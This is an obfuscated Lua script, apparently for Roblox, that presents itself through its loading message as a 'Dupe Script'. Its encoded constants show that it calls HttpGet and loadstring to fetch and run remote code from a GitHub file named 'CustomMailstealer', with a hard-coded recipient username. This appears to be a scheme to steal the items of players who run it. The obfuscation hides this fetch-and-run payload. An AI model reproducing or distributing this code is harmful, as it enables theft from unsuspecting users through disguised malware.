--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v82,v19);v19=nil;v89=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -(1 + 2))^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(878 -(282 + 595)))) + (2 -1))) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=0;local v85;while true do if (v84==(931 -(857 + 74))) then v85=(570 -(367 + 201))^(v32-(928 -(214 + (2350 -(1523 + 114))))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * 256) + v36 ;end if (v35==(1065 -(68 + 997))) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;v35=118 -(32 + 84 + 1) ;end end end local function v23()local v38=0 + 0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (16778173 -(892 + 65))) + (v41 * (156337 -90801)) + (v40 * ((1158 -686) -216)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + 4 ;v38=181 -(67 + 113) ;end end end local function v24()local v43=v23();local v44=v23();local v45=3 -2 ;local v46=(v20(v44,1 + 0 ,79 -59 ) * ((954 -(802 + 150))^(85 -53))) + v43 ;local v47=v20(v44,21,(497 -(416 + 26)) -24 );local v48=((v20(v44,32)==1) and  -1) or (1 + (0 -0)) ;if (v47==(997 -(915 + 82))) then if (v46==((0 + 0) -0)) then return v48 * (0 + 0) ;else local v91=0 -0 ;while true do if ((1187 -((1890 -821) + 118))==v91) then v47=(440 -(145 + 293)) -1 ;v45=0 -0 ;break;end end end elseif (v47==(356 + 1691)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(430 -(44 + 386))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1487 -(998 + 488)) );v18=v18 + v49 ;local v51={};for v65=1 + 0 , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v67=811 -(569 + 242) ;while true do if (v67==(2 -1)) then if ((1 + 2)==v52) then local v96=1024 -(706 + 318) ;while true do if (v96~=(0 + 0)) then else for v118=1 -0 ,v23() do v54[v118-1 ]=v28();end return v56;end end end if (v52~=2) then else local v97=1262 -(1091 + 171) ;local v98;while true do if (v97~=(0 -0)) then else v98=0;while true do if ((0 + 0)==v98) then for v153=701 -(271 + 429) ,v57 do local v154=0 -0 ;local v155;local v156;while true do if (v154~=(0 -0)) then else v155=v21();v156=nil;v154=375 -(123 + 251) ;end if (v154~=(4 -3)) then else if (v155==(699 -(208 + 490))) then v156=v21()~=(0 + 0) ;elseif (v155==(1 + 1)) then v156=v24();elseif (v155~=(839 -(660 + 176))) then else v156=v25();end v58[v153]=v156;break;end end end v56[3]=v21();v98=1 + 0 ;end if (v98~=(1 + 0)) then else for v157=1 + 0 ,v23() do local v158=202 -(14 + 188) ;local v159;local v160;while true do if (v158~=1) then else while true do if ((0 + 0)~=v159) then else v160=v21();if (v20(v160,530 -(406 + 123) ,1)==0) then local v174=675 -(534 + 141) ;local v175;local v176;local v177;while true do if (v174~=1) then else local v178=0 + 0 ;local v179;while true do if (v178==(0 + 0)) then v179=0 + 0 ;while true do if (v179==0) then local v189=1322 -(1249 + 73) ;while true do if (v189==(0 -0)) then v177={v22(),v22(),nil,nil};if (v175==0) then local v190=0;local v191;local v192;local v193;while true do if ((1 + 0)==v190) then v193=nil;while true do if ((396 -(115 + 281))~=v191) then else local v196=0;while true do if (v196==(1900 -(106 + 1794))) then v192=0 -0 ;v193=nil;v196=1 + 0 ;end if (v196~=1) then else v191=1 + 0 ;break;end end end if (v191==(2 -1)) then while true do if (v192~=0) then else v193=0 -0 ;while true do if (v193==0) then v177[870 -(550 + 317) ]=v22();v177[5 -1 ]=v22();break;end end break;end end break;end end break;end if ((0 -0)~=v190) then else v191=0 -0 ;v192=nil;v190=1;end end elseif (v175==(115 -(4 + 110))) then v177[587 -(57 + 527) ]=v23();elseif (v175==2) then v177[288 -(134 + 151) ]=v23() -((1429 -(41 + 1386))^16) ;elseif (v175==3) then local v197=103 -(17 + 86) ;local v198;local v199;while true do if (v197~=(1665 -(970 + 695))) then else v198=0 + 0 ;v199=nil;v197=1 -0 ;end if (v197==1) then while true do if (v198==(1990 -(582 + 1408))) then v199=0;while true do if ((0 -0)==v199) then v177[3 -0 ]=v23() -((5 -3)^16) ;v177[4]=v22();break;end end break;end end break;end end end v189=3 -2 ;end if (v189~=1) then else v179=1825 -(1195 + 629) ;break;end end end if (v179~=1) then else v174=6 -4 ;break;end end break;end end end if (v174==2) then local v180=0 + 0 ;while true do if (v180==(1 -0)) then v174=244 -(187 + 54) ;break;end if ((780 -(162 + 618))~=v180) then else if (v20(v176,1 -0 ,1)~=(66 -(30 + 35))) then else v177[2]=v58[v177[2 + 0 ]];end if (v20(v176,2,1259 -(1043 + 214) )==1) then v177[11 -8 ]=v58[v177[2 + 1 ]];end v180=1 -0 ;end end end if (v174~=3) then else if (v20(v176,3,4 -1 )==(2 -1)) then v177[1 + 3 ]=v58[v177[584 -(361 + 219) ]];end v53[v157]=v177;break;end if (v174==(1636 -(1373 + 263))) then local v182=0 + 0 ;while true do if (v182==(1001 -(451 + 549))) then v174=1 + 0 ;break;end if ((0 -0)~=v182) then else v175=v20(v160,2,4 -1 );v176=v20(v160,1388 -(746 + 638) ,3 + 3 );v182=1 -0 ;end end end end end break;end end break;end if (v158==0) then local v173=341 -(218 + 123) ;while true do if (v173==1) then v158=1 + 0 ;break;end if (v173==(1581 -(1535 + 46))) then v159=0;v160=nil;v173=1 + 0 ;end end end end end v52=1 + 2 ;break;end end break;end end end break;end if (v67==0) then if (v52==0) then local v99=0;local v100;while true do if (v99==0) then v100=560 -(306 + 254) ;while true do if (v100~=(0 + 0)) then else v53={};v54={};v100=1 + 0 ;end if ((739 -(542 + 196))~=v100) then else v55={};v52=1 -0 ;break;end end break;end end end if (v52~=(1468 -(899 + 568))) then else local v101=0 + 0 ;while true do if (v101==(0 + 0)) then v56={v53,v54,nil,v55};v57=v23();v101=291 -(60 + 230) ;end if (v101==(573 -(426 + 146))) then v58={};v52=1 + 1 ;break;end end end v67=1457 -(282 + 1174) ;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then do return;end elseif (v81>1) then local v120=v80[2];local v121,v122=v71(v78[v120](v13(v78,v120 + 1 ,v80[3])));v73=(v122 + v120) -1 ;local v123=0;for v146=v120,v73 do v123=v123 + 1 ;v78[v146]=v121[v123];end else v72=v80[3];end elseif (v81<=3) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end elseif (v81==4) then v78[v80[2]]=v80[3];else v61[v80[3]]=v78[v80[2]];end elseif (v81<=8) then if (v81<=6) then local v102;local v103,v104;local v105;local v106;v61[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v106=v80[2];v105=v78[v80[3]];v78[v106 + 1 ]=v105;v78[v106]=v105[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v106=v80[2];v103,v104=v71(v78[v106](v13(v78,v106 + 1 ,v80[3])));v73=(v104 + v106) -1 ;v102=0;for v116=v106,v73 do local v117=0;while true do if (v117==0) then v102=v102 + 1 ;v78[v116]=v103[v102];break;end end end v72=v72 + 1 ;v80=v68[v72];v106=v80[2];v78[v106]=v78[v106](v13(v78,v106 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81==7) then local v138=v80[2];local v139=v78[v80[3]];v78[v138 + 1 ]=v139;v78[v138]=v139[v80[4]];else local v143=0;while true do if (1==v143) then v72=v72 + 1 ;v80=v68[v72];v61[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v143=2;end if (v143==0) then v61[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v143=1;end if (3==v143) then v72=v80[3];break;end if (v143==2) then v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v143=3;end end end elseif (v81<=9) then v78[v80[2]]();elseif (v81==10) then local v144=v80[2];v78[v144]=v78[v144](v13(v78,v144 + 1 ,v73));elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O7361676503043O005245414C030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D65030A3O0074616B6F333033303330030F3O00475F4C6F6164696E675363722O656E03253O004475706520536372697074204C6F6164696E6720706C656173652057414954202E202E202E00163O0012043O00013O00260B3O000D000100020004013O000D0001001204000100043O001206000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O0015000100260B3O0001000100010004013O000100010012040001000A3O001208000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100016O00017O00",v9(),...);
